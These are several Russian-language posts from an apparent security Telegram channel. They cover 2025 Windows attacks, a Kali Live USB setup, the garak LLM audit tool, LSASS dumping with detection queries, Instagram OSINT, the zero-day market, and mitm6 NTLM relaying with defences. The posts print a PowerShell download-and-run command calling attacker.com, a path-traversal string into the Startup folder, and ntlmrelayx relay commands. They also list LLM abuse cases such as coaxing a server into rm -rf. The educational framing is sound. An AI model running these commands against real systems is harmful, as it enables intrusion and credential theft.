СМОТРИТЕ КУДА НАС ЗАНЕСЛО!
ДА-ДА НА ZeroNights

Это очень старая конференция еще 2011 года, админы тогда ходили в школу, а ИБ уже топило во всю!

Спасибо, что слушаете нас, читаете новости, нам очень приятно быть частью ИБ комьюнити и делать хайп для (ради) вас 💚

А какие хакерские девайсы у вас? 😆

Незаметно, тихо — а работает: в 2025-м атакующие всё чаще выбирают «холостые» тропы, чтобы напасть на Windows.

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Как хорошо, что на улице лето и хочется чего-то относительно свежего, например, атак 🙂

Атаки через привычные действия — FileFix 🍞
Представьте себе: вы переходите на веб-страницу с просьбой «открыть проводник и вставить адрес» - вы же не робот, верно?
Всё выглядит безобидно, но на самом деле это хитрое социальное инженерное ВПО. Метод FileFix, открытый в июне 2025, запускает проводник из браузера и тайком копирует в буфер обмена PowerShell-команду. Когда пользователь вставляет её в адресную строку Explorer — она выполняется, и зачастую мимо антивирусов.

powershell -Command "Invoke-WebRequest -Uri 'http://attacker.com/malicious_payload.exe' -OutFile 'C:\Windows\Temp\malicious_payload.exe'; Start-Process 'C:\Windows\Temp\malicious_payload.exe'"

Смена доверенных процессов — CVE-2025-21204 🧛
CVE-2025-21204 - это уязвимость повышения привилегий в механизме обновлений Windows, позволяющая локальному авторизованному пользователю выполнить произвольный код с правами SYSTEM. Уязвимость связана с некорректной обработкой символических ссылок (symlink) в процессе обновления Windows Update Stack.

mklink /D C:\Windows\SoftwareDistribution\Download\update C:\inetpub\wwwroot\malicious_payload.exe

Скрытая эксплуатация WinRAR: как RomCom использовала CVE-2025-8088 🌽
В 2025 году группа RomCom начала использовать уязвимость WinRAR CVE-2025-8088, связанную с обходом путей при извлечении архивов. Суть атаки заключалась не в самом файле, а в том, как он был упакован. Злоумышленники создавали RAR-архивы с «ловушкой» — файлы внутри имели искусственно модифицированные относительные пути. При извлечении WinRAR «перепрыгивал» через обычные каталоги и размещал содержимое в системных папках, включая автозагрузку или каталоги для сервисов.

RomCom автоматически создавали иерархию каталогов с длинными цепочками ..\..\ и смешивали их с символами Unicode, чтобы Windows воспринимала путь как легальный, а WinRAR извлекал файл в неожиданное место. То есть атака была полностью скрытой для пользователя — извлечение выглядело как обычная операция с документом, но результатом была установка скриптов и программ, которые запускались при старте системы.

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

Сегодня без выводов, просто про хайп

Подписывайтесь на канал, дальше больше!

RedBlue Notes на связи!

Помните, мы писали о ZeroNights? Так вот у них сейчас идёт приём заявок на участие с докладами 🎙

Как всегда, мероприятие посвящено актуальным вопросам информационной безопасности и предлагает площадку для обмена практическим опытом между ведущими экспертами (а я знаю, что среди подписчиков такие есть 😎)

Конференция принимает доклады, сфокусированные на Offensive Security, AppSec и SecOps. За эксклюзивные материалы предусмотрено материальное вознаграждение 🤑

Дополнительная информация и подача заявок доступна на сайте конференции

Kali Linux на флешке
Всем привет!
Очень много работы навалилось, но мы стараемся не забывать про наш канал 👨‍💻
На следующей неделе планируем выкатить что-то особенно интересное, так что оставайтесь с нами 😛

Обычно Kali запускают в виртуалках или ставят на отдельный диск.

Есть вариант поинтереснее:
Kali Linux Live с сохранением (Persistence) на флешке.
Вдруг кто не знал 🙂

USB\SSD\HDD
Флешка становится переносной полноценной системой: загружается на любом ПК, все изменения сохраняются на ней. Если нужно — флешку «сбрасываешь»/выбрасываешь🧛, и хост остаётся в исходном состоянии (с собственной ОС или без неё).

С чего начать?
Скачать обязательно LIVE образ Kali:
тык
Дальше можно записать образ не только на флешку, но и на SSD или даже HDD — тут особой разницы нет. Я, например, использовал BalenaEtcher: она без проблем видит не только обычные флешки, но и SSD-диски, так что образ я зашивал именно на SSD. После записи остаётся просто загрузиться с носителя и при старте выбрать пункт

Live system (persistence)

Важно: перед этим нужно отключить Secure Boot, иначе система просто не запустится.

Создаём раздел для сохранения
Смотрим разделы, чтоб определить где размечен наш Linux

lsblk

После записи на флешке появится свободное место. Используем gparted или fdisk:
sudo fdisk /dev/sdb
создаём новый раздел (например, /dev/sdb3). форматируем его в ext4 и называем persistence:

sudo mkfs.ext4 -L persistence /dev/sdb3

Настраиваем Persistence

sudo mount /dev/sdb3 /mnt

Создаём файл persistence.conf:

echo "/ union" | sudo tee /mnt/persistence.conf

и размонитруем:

sudo umount /mnt

Перезагружаемся и теперь можно работать как с обычной ОС!

Ну или вот подробный гайд

Зачем это нужно специалисту по безопасности?
🔫 Тестирование инфраструктуры — можно прийти на объект, загрузиться со своей флешки и не трогать локальную систему.
😑 Анонимность — после извлечения флешки на компе не остаётся следов.
🍩 Удобство — все любимые инструменты (Metasploit, nmap, Burp Suite) всегда под рукой.
🗃Мобильность — одна флешка заменяет ноутбук с софтом.

Но и без минусов не обойдется:
Нужны современные порты USB 3.0, чтобы скорость работы была адекватной. Я, например, взял SSD и внешний бокс под 3.0, и система работает вполне шустро.
Износ носителя — SSD, конечно, живут дольше, чем флешки, но при активной записи (логи, обновления, сканы) они тоже постепенно изнашиваются.
Secure Boot — если на устройстве стоит вторая система Windows, придётся постоянно переключать этот параметр в BIOS.
Kali Live — не всегда идеально дружит с драйверами Wi-Fi, видеокарт и тачпадов, иногда нужны дополнительные настройки.

Аудит языковых моделей 🤖

RedBlue Notes на связи! Сегодня мы расскажем об инструменте для аудита нейросетевых моделей от Nvidia - garak

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Установка делается буквально в 1 команду:

python -m pip install -U garak --break-system-packages

Дальше, вам надо получить список доступных языковых моделей. Это можно сделать на вашем OpenWebUI по пути https://ai-server.ru/api/models/ или на сайте OpenAI.

Если ваши языковые модели крутятся на выделенном сервере, надо написать конфигурационный файл для коннекта.

Json файл для OpenWebUI:

{
    "openai": {
        "OpenAICompatible": {
            "uri": "https://ai-server.ru/api/",
            "suppressed_params": ["n", "frequency_penalty", "presence_penalty"]
        }
    }
}

Yaml файл для OpenWebUI:

plugins:
  generators:
    openai:
      OpenAICompatible:
        uri: https://ai-server.ru/api/
        temperature: 0.6
        top_p: 1.0
        suppressed_params:
          - n
          - frequency_penalty
          - presence_penalty
  model_name: qwen2.5-32b 
  model_type: openai.OpenAICompatible

Далее - сгенерируйте api ключ из вашего профиля и экспортируйте его в терминале:

export OPENAICOMPATIBLE_API_KEY="sk-******"
export OPENAI_API_KEY="sk-******"

И после всех этих шагов, наконец можно переходить к аудиту:

python -m garak -m openai.OpenAICompatible -n llama3.3 -p all --generator_option_file compatible.json

Объясняем флаги:
🔤 -m openai.OpenAICompatible - потому что у меня свой ИИ сервер, если у вас его нет, можете обратиться к openai
🔤 -n llama3.3:latest - выбор языковой модели
🔤 -p all - выбор тестов, которые будут запускаться, в данном случае выбраны все. Список доступных тестов можно вывести командой python -m garak --list_probes

И на выходе получаем несколько файлов:
🔤 json со всеми промтами
🔤 json с промтами, которые по мнению утилиты ломают языковую модель
🔤 html отчёт с процентами прошедших вредоносных промтов

А дальше - самое сложное - ручная проверка промтов из второго файла (потому что html вообще не информативный). Вот пара интересных кейсов с ИИ моделями:
🔤 Уговорить сервер сделать rm -rf и положить нейросетевой сервис
🔤Подсунуть промт, который в браузере просит разрешение на открытие приложения, а потом исполняет код
🔤 Внедрить вредоносные ссылки в ответы нейросетевой модели

Интересно, как будет развиваться защита языковых моделей. Рынок активно развивается и мы пристально следим за тем, какие новые уязвимости находят в направлении ИИ, и как от них защищаются 👀

Если поставите много реакций - мы напишем пост про ИИ инструменты для пентеста 🤑

Подписывайтесь на канал, дальше больше!

Яндекс, вы там не устали меня хантить?
Я к вам не приду, не переживайте ❤️

LSASS Dump over WMI 🤩

Давайте немного о OS Credential Dumping. Ресерчеры из SpecterOps показали инструмент для дампа кредов из памяти процесса LSASS через протокол WMI 🕺

В чем фича кэп? Нет взаимодействия с классом Win32_Process который палит любой приличный EDR - стильно, модно, молодежно!

🛡 Detection

event.code: 11 and file.path: *Windows\\Temp* and file.extension: dmp

Создание .dmp файла в Temp директории Windows

event.code: 5145 and winlog.event_data.ShareName: *.dmp

Эксфильтрация дампа через SMB шару

💻 Repo: https://github.com/0xthirteen/WMI_Proc_Dump

📖 Research: https://specterops.io/blog/2025/09/18/more-fun-with-wmi/

🧢 s0ld13r

А вы помните, раньше на RedBlue Notes часто посты выходили?
Я помню 🙂

Ребят, очень много работы, жаль рассказать не можем, очень инетресно)

Постараемся на выходных рассказать что-то классное 😑

Что хакеры могут узнать о вас за 30 секунд из Instagram?

Кажется, что выкладывать фотки в Instagram — безопасно. Но любой человек с минимальными знаниями OSINT (поиск открытой информации) может собрать о вас досье быстрее, чем вы успеете сделать сторис.

Фото — кладезь информации
EXIF-метаданные: если фото сделано на телефон и вы не убрали данные, в них может быть точная геолокация, модель устройства, время съёмки.
😏 Утилиты: exiftool, metadata2go.com
Фон на фото: вывески, номера домов, редкие детали интерьера.
😏 Приём: поиск по картинке в Google/Yandex, нейросети вроде PimEyes.

Подписи и комментарии
Люди часто сами выдают: где живут, где работают, как зовут друзей/детей.
😏 Инструменты: Maltego (собирает связи), Sherlock (ищет ники по всем соцсетям). InstaCrawler / Social Mapper – собирают связи и даже могут угадать email

Сборка пазла
Фото кофе каждое утро → любимое кафе.
Селфи с пропуском на шее → компания и должность.
Кадр с парковкой и номером машины → поиск владельца по базе

Для хакера этого достаточно, чтобы подобрать пароли, понять ваш график и даже спланировать взлом или реальную кражу.

Это конец?
Вся эта собранная по крупицам информация превращается для злоумышленника в готовую дорожную карту: зная ваш распорядок, любимые места и знакомых, он спокойно подбирает момент и роль — будь то «коллега», «курьер» или «сотрудник банка», чтобы завоевать ваше доверие. Из совпадений в подписях и фото легко складываются ответы на вопросы восстановления аккаунтов и элементы для подбора паролей; из геопозиций и ракурсов — адреса и время, когда и где тебя искать. В результате это не просто цифровой вред — это быстрый путь к угонам аккаунтов, краже денег, компрометации рабочих систем и даже реальной слежке.

А знаете что самое интересное?
Рансом Ryuk проник в инфраструктуру компании через переписку с «девушкой» в Instagram, которая длилась 2–3 месяца. Сотрудника убедили открыть интимные фото (жопа.ехе явно 🙂) на рабочем компьютере — и через это получили доступ.
______
Кстати, хорошая получилась картинка для мини-поста очень мемная)

P.S. второй день пытаюсь поднять GOAD лабу - уже дело принципа, не одно так другое, очень капризная 🔫

Подписывайтесь на канал, дальше больше!

Магазин "ноль-дей"
Что это за рынок, кому он нужен и можно ли купить «zero-day» как товар — разберёмся

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

Кто находит уязвимости и зачем их продают? 😑
Люди, которые находят уязвимости, бывают разные. Одни идут в вендора и говорят: «У вас проблема — вот доказательство, вот патч». Другие держат находку в секрете, чтобы использовать её позже, и третьи предлагают её на продажу. Именно третья группа — источник «магазинной» версии ноль-дей: исследователь получает деньги, а покупатель получает возможность проникнуть туда, куда не должен.
Причины продаж просты: иногда баг-баунти платят мало, у исследователя есть финансовая необходимость, иногда мотивы политические, просто поблечить)

Как устроен рынок: не маркетплейс, а сеть посредников 🚶‍♂️
Это не сайт с корзиной и «купить в один клик». Это закрытая экосистема: исследователи, брокеры, фирмы-агрегаторы и покупатели. Сделка редко происходит публично; тут важны репутация, гарантии работы эксплойта и, зачастую, личные связи. Посредники тестируют эксплойты, собирают портфели и предлагают их структурам с большими кошельками. Это похоже не на рынок потребительских товаров, а на тенистый финансовый рынок, где каждое вложение — ставка на то, что цена уязвимости оправдает себя.

Почему одна уязвимость может парализовать мир 🤹
Одна уязвимость — и цепочка начинается. Если она попадёт в «боевую» эксплуатацию, последствия могут быть масштабными. Случалось, что дефект в широко распространённом ПО использовали для создания червей, которые быстро распространялись по сетям, выводя из строя больницы, заводы и логистику. Это не только техническая поломка; это экономический удар и человеческие риски.
Опасность заключается ещё в том, что покупатель определяет судьбу уязвимости. Когда она идёт производителю, её закрывают. Когда идёт тем, кто хочет проникнуть — её используют для атак. Этот выбор делает рынок уязвимостей этическим и политическим, а не только технологическим.

Легальные альтернативы: баг-баунти и открытые исследования 🤱
Существует противоположный путь: баг-баунти и программы вознаграждений. Они предлагают исследователям легальный канал для передачи найденных дефектов и платят за это. Для компаний это способ получить внешние глаза и закрыть проблемы до того, как они станут товаром. Но тут есть нюанс — вознаграждения разные, а у брокеров порой есть финансовый стимул платить больше. Экономика уязвимостей пока не всегда поощряет честность.

Как сместить баланс в пользу безопасности 🤯
Чтобы уязвимости не превращались в инструмент вреда, важно равновесие между технологиями, экономикой и ответственностью. На этом рынке нет героев и злодеев: одни ищут баланс, другие пренебрегают честностью — компании занижают ценность находок, исследователи продают их тем, кто заплатит больше. Всё упирается в отношение: если безопасность — это инвестиция, а не расход, меньше уязвимостей уйдёт в дарк маркет. Ведь рынок эксплойтов — зеркало того, как мы ценим честность и безопасность.

И, разумеется, всё сказанное — не истина в последней инстанции. Это лишь размышления одного из админов, высказанные вслух после нескольких лет наблюдений за тем, как мир ИБ балансирует между этикой, деньгами и технологией.

Подписывайтесь на канал, дальше больше!

ОБЗОР УТИЛИТЫ MITM6: ФУНКЦИОНАЛ, АТАКИ И ЗАЩИТА

RedBlue Notes на связи! Сегодня расскажу о утилите, которую стоит запускать при пентесте любой инфраструктуры с Active Directory

Пост имеет ознакомительный характер и предназначена для специалистов по безопасности. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.

ФУНКЦИОНАЛ MITM6
mitm6 - это инструмент для проведения MITM атак в сетях IPv6. Он позволяет эксплуатировать особенности работы протокола NDP (Neighbor Discovery Protocol) для перехвата трафика и потенциального получения учетных данных. mitm6 становится шлюзом по умолчанию для всех IPv6-клиентов в локальной сети. Это достигается путем прослушивания DHCPv6-запросов и отправки поддельных ответов, указывающих атакующего как DNS по умолчанию. После этого весь IPv6-трафик жертв начинает направляться к атакующему 💻

АТАКИ С ИСПОЛЬЗОВАНИЕМ MITM6 🔓
1. Захват NTLM-хэшей
После того как mitm6 стал DNS-сервером по умолчанию, он может отвечать на DNS-запросы поддельными записями, направляя трафик на контроллер атакующего. Если клиент попытается обратиться к несуществующему ресурсу (например, `wpad.domain.local`), mitm6 может предоставить адрес атакующего, который будет выдавать себя за WPAD-прокси. Это приведёт к автоматической отправке NTLM-аутентификации от клиента, которую можно перехватить

Запускаем mitm6:

mitm6 -d domain.local

Запускаем ntlmrelayx для захвата хэшей:

ntlmrelayx.py -6 -wh attacker_ip -of hashes.txt

Ждём....

Теперь, когда клиенты начнут использовать атакующего как DNS-сервер, их попытки аутентификации будут перехватываться и ретранслироваться 😼

2. Ретрансляция NTLM-хэшей
С помощью утилиты ntlmrelayx, которая часто используется совместно с mitm6, можно ретранслировать перехваченные NTLM-хэши на другие системы. Это позволяет выполнять атаки на повышение привилегий, например, создание новых пользователей или выполнение команд на удалённых системах 🕺

ntlmrelayx.py -6 -wh attacker_ip -t smb://target_ip -c "whoami"

3. Перехват LDAP-трафика
Если клиенты используют IPv6 для связи с контроллерами домена, mitm6 может перенаправить этот трафик через себя, что даёт возможность перехватить LDAP-запросы и потенциально получить доступ к конфиденциальной информации 🤫

ntlmrelayx.py -6 -wh attacker_ip -t ldaps://target_dc_ip

ЗАЩИТА ОТ MITM6 🛡
1. Отключите IPv6 (если не используется)
2. Настройте защиту от поддельных DHCP-ответов и RA-сообщений от неавторизованных источников
3. Использование статических маршрутов и DNS. Это снизит вероятность того, что они примут поддельные настройки от mitm6
4. Мониторьте трафик. Регулярный анализ сетевого трафика на предмет аномалий, таких как неожиданные изменения маршрутов или DNS-запросы к подозрительным адресам, может помочь обнаружить использование mitm6

ДЕТЕКТ MITM6 👀
1. Ищите аномальные DHCPv6-ответы в логах, это может указать на использование mitm6. Обратите внимание на новые IPv6-адреса, назначенные вручную и необычные DNS по умолчанию
2. Ищите подозрительные RA-сообщения, аномальные DNS-запросы и ответы
3. Используйте IDS/IPS для отслеживания подозрительных действий, связанных с IPv6 и NDP

Надеюсь, на этот канал подписаны Red и Blue тимеры из одной компании и они начнут играть в кошки-мышки с mitm6 после прочтения этого поста. Да начнутся Голодные игры, и пусть удача всегда будет с вами! 🥰

Подписывайтесь на канал, дальше больше!